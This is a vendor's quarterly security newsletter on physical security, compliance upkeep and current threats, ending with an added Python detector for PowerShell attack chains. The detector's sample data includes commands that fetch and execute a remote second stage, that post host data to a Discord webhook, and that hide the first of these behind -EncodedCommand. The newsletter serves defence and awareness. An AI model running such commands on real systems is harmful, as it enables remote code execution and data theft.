TCT is committed to helping you keep your organization secure and compliant. Every quarter, we publish compliance and security insights that you can share with your employees to fulfill periodic security reminder requirements your organization may be subject to.
As an added bonus, we’ve highlighted some developing security trends and featured a quick tip to get more out of your compliance management.
Physical Security is Important!
It’s not uncommon for me to do an on-site visit for a client and discover basic physical security failures that need to be addressed. These are gaps as simple as missing or inadequate locks on doors, or no security cameras at all.
Physical security is a critical part of effective cybersecurity. If your organization is going to protect your sensitive information, you’ll need to be vigilant in enforcing the following best practices.
Cover all locations
Consider every facility your organization is responsible for, including the one-person sales office. Don’t disregard a tiny satellite office just because only one or two people staff it. As they say, it isn’t the size of the office, it’s what you do with it.
Any office with connectivity to your main network is a potential security risk, and you need to pay attention to its physical security. Bad actors will see a vulnerable small office as an easy entryway into your entire network.
Secure every entrance and exit
Verify that each of your locking mechanisms on your doors is functioning properly. Make sure that you have monitoring for every entrance and exit.
Have modes of authentication for people entering and leaving the building (e.g., badge entry). Install cameras at each of the entrances, not just the main entrance. If someone wants to get unauthorized access to your building, they’ll be willing to go through unauthorized entrances — including emergency exits, windows, and rooftop access points.
Never let anyone piggyback their way into your facility. Employees should never hold the door open for someone coming into the building — even if it’s an employee they know, because that employee could have been fired the day before and lost their access.
There should be a visitor badging system for your building. If any of your employees sees a visitor without their badge, the employee should stop them and ask, “Who are you here to see? How can I help you?” Then escort the visitor back to the front desk and get them signed in.
What about leased buildings?
I often hear the comment, “We lease that building, so it’s not my responsibility to take care of its physical security.” Chances are, the owner of that building doesn’t have a clue that there’s a security issue. It’s your business that’s occupying the building, so there’s a shared responsibility. It’s your stuff you need to protect.
It may be someone else’s building but the impact of a breach is going to fall to you. So report these shortcomings to your landlord to get them on the list to be addressed.
Do your facilities have adequate physical security? Dive deeper: There Is No Cybersecurity Without Physical Security Best Practices
Quick Tip: TCT Portal’s Operational Mode Covers Your A$$ After Achieving Compliance
Once you’ve achieved compliance with a certification, you aren’t done with it. You’re obligated to maintain compliance with routine activities that fall on daily, weekly, monthly, quarterly, semi-annual and annual cadences.
TCT Portal’s Operational Mode makes these responsibilities easier. Operational Mode uses automation to help ensure that you never miss one of your ongoing compliance maintenance responsibilities.
I’ve seen organizations with lapses in their operational compliance requirements, such as quarterly vulnerability scans. When they head into their annual Assessment, their Assessor says, “I’m sorry, but we can’t sign off on your annual assessment until you have four quarterly scans.” If you miss a scan in the third quarter, the Assessor can’t sign off on your PCI for another six months.
Operational Mode serves those periodic time-based tasks to the appropriate people on your team. It allows you to be proactive with your evidence gathering, lets you see everything that’s overdue, and enables you to sort all the tasks by due date. With just a glance, project managers can easily track what’s coming up, when it’s due, who it’s assigned to, and whether or not it’s been completed.
You’re never left wondering what the current state of your compliance management looks like — it’s clear as day.
What’s Going on in Security Today
Fake Browser Updates Used in Malware Distribution
There is an upward trend in attacks that exploit users’ trust in safe, well-known software by delivering malware disguised as an update. Using fake browser update lures on compromised websites, threat actors such as TA569 have been injecting JavaScript and HTML into those sites to deliver the SocGholish malware, posing as a legitimate update for the user’s web browser.
The lure trades on users’ trust in mainstream browsers, and it is designed to get around the habits that an organization’s Security Awareness Training is meant to instill. A genuine browser never asks you to download and run an update from a third-party website.
NSA and CISA Advise on Top Ten Cybersecurity Misconfigurations
The NSA and CISA have jointly released a list of the ten most common cybersecurity misconfigurations their red and blue teams encounter. Among them: leaving default software or hardware credentials in place when deploying a system, weak or misconfigured Two-Factor/Multi-Factor Authentication, and unrestricted code execution. Addressing these ten items would greatly reduce an organization’s attack surface and the vectors available to an attacker.
Five Eyes intelligence chiefs warn China is using AI to steal intellectual property
The Five Eyes intelligence alliance (the US, the UK, Canada, Australia, and New Zealand) has issued a joint statement warning that China is using AI to assist its state-sponsored hackers in hacking and spying against not only the Five Eyes countries but the rest of the world.
The targeting is not limited to homes or small businesses. There are reports that companies working on robotics, biotech, AI, and even quantum technology have been targeted by China’s cyber operators, who are using AI to speed up their reconnaissance and operations without slowing the pace of their intrusions.
FBI Director Christopher Wray has stated that China has “a bigger hacking program” than that of every other major nation combined. The sheer scale of the activity makes it that much more challenging to thwart.
Exploring the Realm of Malicious Generative AI: A New Digital Security Challenge
Malicious AI is already starting to blossom alongside the legitimate AI solutions now in place. FraudGPT, for example, can craft spear-phishing campaigns, create counterfeit invoices, and write fake news articles, among other things, all in the service of taking down organizations and exploiting or defrauding employees, up to and including upper management.
The same tooling can be used to shift public opinion on a topic and to support cyber-attacks.
Discord: A Playground for Nation-State Hackers Targeting Critical Infrastructure
Discord is one of the most popular communication applications on the market today. That makes it both a lucrative target and a useful platform to launch attacks from. Abusing functionality Discord already provides, such as webhooks, an attacker lures the victim to a rigged website that runs a script; that script launches PowerShell, which downloads a second PowerShell script from a GitHub repository and executes it.
The first-stage file is not especially dangerous on its own. But because the second stage is fetched at run time, once the chain has executed the attacker can swap the GitHub-hosted script for something far more malicious, even to the point of harming physical hardware.
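As an added example (not from the original post, and not a TCT product feature), the following Python scans PowerShell script-block log text for the chain described above: a download cradle pulling a second stage from GitHub, a script contacting a Discord webhook, and obfuscation via -EncodedCommand. The sample log lines, repository path, and webhook ID/token are constructed for illustration; the cmdlet names and hostnames are real.

```python
"""Flag PowerShell download cradles and Discord webhook use in script-block logs.

Added example, not code from the original post. It scans constructed sample
script-block text (the shape of Windows Event ID 4104 ScriptBlockText) for
the chain described in the article: PowerShell fetching a second stage from
GitHub and talking to a Discord webhook. The sample log lines, repo path and
webhook ID/token below are made up; cmdlet names and hostnames are real.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Download-cradle primitives. These are legitimate cmdlets and aliases; they only
# become suspicious when combined with a remote code host or a webhook.
CRADLE = re.compile(
    r"(Invoke-Expression|\biex\b|DownloadString|DownloadFile|"
    r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|Net\.WebClient|Start-BitsTransfer)",
    re.IGNORECASE,
)
# Raw GitHub content and the Discord webhook API path used in the attack chain.
REMOTE_CODE_HOST = re.compile(r"raw\.githubusercontent\.com|github\.com/[^\s'\"]+/raw/", re.IGNORECASE)
DISCORD_WEBHOOK = re.compile(r"discord(?:app)?\.com/api/webhooks/", re.IGNORECASE)
# -e / -enc / -EncodedCommand followed by a base64 blob (PowerShell encodes UTF-16LE).
ENCODED = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def decode_encoded_commands(text: str) -> str:
    """Return the text plus the UTF-16LE plaintext of any -EncodedCommand payload,
    so the cradle patterns also see invocations hidden behind base64."""
    extra = []
    for m in ENCODED.finditer(text):
        try:
            extra.append(base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="replace"))
        except (ValueError, UnicodeDecodeError):
            continue
    return text + ("\n" + "\n".join(extra) if extra else "")


@dataclass
class Finding:
    line_no: int
    score: int
    reasons: List[str] = field(default_factory=list)


def analyze_block(line_no: int, text: str) -> Optional[Finding]:
    """Score one script block. A cradle alone is too noisy to alert on, so a
    Finding is returned only when a cradle is combined with at least one other
    indicator (remote code host, Discord webhook, or encoded command)."""
    expanded = decode_encoded_commands(text)
    reasons = []
    has_cradle = bool(CRADLE.search(expanded))
    if has_cradle:
        reasons.append("download cradle")
    if REMOTE_CODE_HOST.search(expanded):
        reasons.append("fetches from GitHub raw content")
    if DISCORD_WEBHOOK.search(expanded):
        reasons.append("contacts Discord webhook")
    if ENCODED.search(text):
        reasons.append("uses -EncodedCommand")
    if not has_cradle or len(reasons) < 2:
        return None
    return Finding(line_no, len(reasons), reasons)


def scan(blocks: List[str]) -> List[Finding]:
    """Run analyze_block over every script block, numbering them from 1."""
    return [f for f in (analyze_block(i, b) for i, b in enumerate(blocks, 1)) if f]


# Constructed sample script blocks (not real telemetry).
SAMPLE_SCRIPT_BLOCKS = [
    # 1: benign admin housekeeping
    "Get-ChildItem C:\\Logs | Where-Object { $_.Length -gt 1MB } | Remove-Item",
    # 2: benign download (a cradle cmdlet, but no second indicator, so not flagged)
    "Invoke-WebRequest https://www.powershellgallery.com/packages/Pester -OutFile pester.zip",
    # 3: stage one pulling and executing a second stage from GitHub raw content
    "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/example-user/repo/main/stage2.ps1')",
    # 4: beacon/exfil to a Discord webhook (fictitious ID and token)
    "$body = @{content=(hostname)} | ConvertTo-Json; Invoke-RestMethod -Uri 'https://discord.com/api/webhooks/0000000000/FAKE_TOKEN' -Method Post -Body $body",
    # 5: the same stage-one cradle hidden behind -EncodedCommand
    "powershell.exe -nop -w hidden -EncodedCommand "
    + base64.b64encode("iwr https://raw.githubusercontent.com/example-user/repo/main/stage2.ps1 | iex".encode("utf-16-le")).decode(),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {f.line_no}: score {f.score}: {', '.join(f.reasons)}")
```

Blocks 3, 4 and 5 are flagged; block 2 is not, even though it uses Invoke-WebRequest, because a single cradle cmdlet is everyday administration. In production the same logic would read ScriptBlockText from Event ID 4104 (requires Script Block Logging to be enabled) and would add allow-lists for the GitHub repositories your own automation legitimately pulls from.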